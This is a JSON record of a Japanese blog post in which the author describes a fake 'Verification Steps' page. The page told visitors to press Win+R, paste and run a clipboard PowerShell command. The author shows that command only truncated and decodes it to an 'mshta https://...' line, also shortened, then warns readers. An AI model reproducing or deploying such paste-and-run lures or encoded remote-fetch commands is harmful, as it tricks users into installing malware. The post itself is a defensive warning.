{"id":2384,"date":"2024-08-15T18:52:51","date_gmt":"2024-08-15T09:52:51","guid":{"rendered":"https:\/\/blog.minatoproject.com\/?p=2384"},"modified":"2024-08-15T18:53:54","modified_gmt":"2024-08-15T09:53:54","slug":"%e3%80%90%e5%b0%8f%e3%83%8d%e3%82%bf%e3%80%91%e6%96%b0%e6%89%8b%e3%81%ae%e3%83%9e%e3%83%ab%e3%82%a6%e3%82%a7%e3%82%a2%ef%bc%9f","status":"publish","type":"post","link":"https:\/\/blog.minatoproject.com\/?p=2384","title":{"rendered":"\u3010\u5c0f\u30cd\u30bf\u3011\u65b0\u624b\u306e\u30de\u30eb\u30a6\u30a7\u30a2\uff1f"},"content":{"rendered":"<div class=\"veu_autoEyeCatchBox\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-1024x576.png\" class=\"attachment-large size-large wp-post-image\" alt=\"\" srcset=\"https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-1024x576.png 1024w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-300x169.png 300w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-768x432.png 768w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-320x180.png 320w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div>\n<p>\u4eca\u65e5\u3001\u3068\u3042\u308b\u30b5\u30a4\u30c8\u3092\u898b\u3066\u3044\u305f\u3089\u5510\u7a81\u306b\u5225\u30bf\u30d6\u304c\u958b\u3044\u3066\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u6587\u8a00\u304c\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Verification Steps<br>1. Press Windows Button \"\" + R<br>2. Press CTRL + V<br>3. 
Press Enter<\/pre>\n\n\n\n<p>\u8981\u3059\u308b\u306b\u300c\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6307\u5b9a\u3057\u3066\u5b9f\u884c\u300d\u3092\u958b\u3044\u3066\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u3092\u8cbc\u308a\u4ed8\u3051\u3066\u5b9f\u884c\u3057\u308d\u3001\u3068\u8a00\u3063\u3066\u3044\u3066\u3001\u3064\u307e\u308a\u3053\u306e\u30bf\u30d6\u304c\u958b\u304b\u308c\u305f\u6642\u70b9\u3067\u4f55\u3084\u3089\u3088\u304b\u3089\u306c\u6587\u5b57\u5217\u304c\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306b\u5165\u3063\u305f\u3068\u601d\u3044\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<p>\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306b\u306f\u4ee5\u4e0b\u306e\u6587\u5b57\u5217\u304c\u5165\u3063\u3066\u3044\u307e\u3057\u305f\u3002\uff08\u8aa4\u64cd\u4f5c\u9632\u6b62\u306e\u305f\u3081\u4e00\u90e8\u7701\u7565\u3057\u307e\u3059\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell.exe -eC bQBz...ADEA<\/pre>\n\n\n\n<p><code>-eC<\/code> \u30d1\u30e9\u30e1\u30fc\u30bf\uff08<code>-EncodedCommand<\/code> \u306e\u7701\u7565\u5f62\uff09\u306f\u3001MSDN\u3092\u898b\u308b\u3068\u6b21\u306e\u3088\u3046\u306b\u66f8\u3044\u3066\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>-EncodedCommand &lt;Base64EncodedCommand&gt;<\/strong><\/p>\n\n\n\n<p>Base 64 \u30a8\u30f3\u30b3\u30fc\u30c9\u6587\u5b57\u5217\u7248\u306e\u30b3\u30de\u30f3\u30c9\u3092\u8a31\u53ef\u3057\u307e\u3059\u3002 \u8907\u96d1\u306a\u5f15\u7528\u7b26\u3084\u4e2d\u304b\u3063\u3053\u3092\u5fc5\u8981\u3068\u3059\u308b\u30b3\u30de\u30f3\u30c9\u3092 PowerShell \u306b\u6e21\u3059\u5834\u5408\u306b\u3053\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u30fc\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002 \u6587\u5b57\u5217\u306f UTF-16LE \u6587\u5b57\u30a8\u30f3\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u3066\u66f8\u5f0f\u8a2d\u5b9a\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n<p><a 
href=\"https:\/\/learn.microsoft.com\/ja-jp\/powershell\/module\/microsoft.powershell.core\/about\/about_powershell_exe?view=powershell-5.1\" target=\"_blank\" rel=\"noopener\" title=\"\">PowerShell exe \u306b\u3064\u3044\u3066 &#8211; PowerShell | Microsoft Learn<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>\u306a\u306e\u3067\u6b21\u306f\u4e0a\u8a18\u306e\u5f15\u6570\u3092Base64\u30c7\u30b3\u30fc\u30c9\u3057\u307e\u3059\u3002MSDN\u306b\u8a18\u8f09\u306e\u3068\u304a\u308a UTF-16 LE \u3068\u3057\u3066\u30c7\u30b3\u30fc\u30c9\u3059\u308c\u3070\u3088\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p>\u30c7\u30b3\u30fc\u30c9\u3059\u308b\u3068\u3053\u306e\u3088\u3046\u306a\u30b3\u30de\u30f3\u30c9\u304c\u51fa\u3066\u304d\u307e\u3057\u305f\u3002\uff08\u8aa4\u64cd\u4f5c\u9632\u6b62\u306e\u305f\u3081\u4ee5\u4e0b\u7565\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mshta https:\/\/...\/...<\/pre>\n\n\n\n<p>mshta\u306fHTA\uff08HTML\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\uff09\u3092\u5b9f\u884c\u3059\u308b\u3001Windows\u306b\u4ed8\u5c5e\u3057\u3066\u3044\u308b\u30b3\u30de\u30f3\u30c9\u3067\u3001URL\u3092\u6e21\u3059\u3068\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u3082\u5b9f\u884c\u3067\u304d\u308b\u3089\u3057\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p>\u4e0a\u8a18\u306eURL\u306e\u4e2d\u8eab\u307e\u3067\u306f\u6016\u3059\u304e\u3066\u8997\u3044\u3066\u3044\u307e\u305b\u3093\u304c\u3001\u4e0b\u8a18\u306e\u3068\u304a\u308a\u30a6\u30a3\u30eb\u30b9\u3063\u307d\u3044\u3082\u306e\u3092\u30d0\u30e9\u6492\u304f\u5e38\u5957\u624b\u6bb5\u3068\u3057\u3066\u53e4\u304f\u304b\u3089\u3042\u3063\u305f\u3063\u307d\u3044\u306e\u3067\u3001\u7686\u3055\u307e\u3082\u4f3c\u305f\u3088\u3046\u306a\u4e8b\u4f8b\u306b\u906d\u9047\u3057\u305f\u5834\u5408\u306f\u3054\u6ce8\u610f\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.co.jp\/archives\/2729\" target=\"_blank\" rel=\"noopener\" title=\"\">HTA\u3092\u5229\u7528\u3057\u305f\u30ef\u30f3\u30af\u30ea\u30c3\u30af\u30a6\u30a8\u30a2\u306e\u65b0\u305f\u306a\u624b\u53e3 | 
(trendmicro.co.jp)<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4eca\u65e5\u3001\u3068\u3042\u308b\u30b5\u30a4\u30c8\u3092\u898b\u3066\u3044\u305f\u3089\u5510\u7a81\u306b\u5225\u30bf\u30d6\u304c\u958b\u3044\u3066\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u6587\u8a00\u304c\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002 Verification Steps1. Press Windows Button &#8220;&#8221; + R2. Press CTRL + V3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1596,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"vkexunit_cta_each_option":"","footnotes":""},"categories":[5],"tags":[],"class_list":["post-2384","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pc"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2384"}],"version-history":[{"count":4,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384\/revisions"}],"predecessor-version":[{"id":2388,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384\/revisions\/2388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/media\/1596"}],"wp:attachment":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest
_route=%2Fwp%2Fv2%2Fcategories&post=2384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}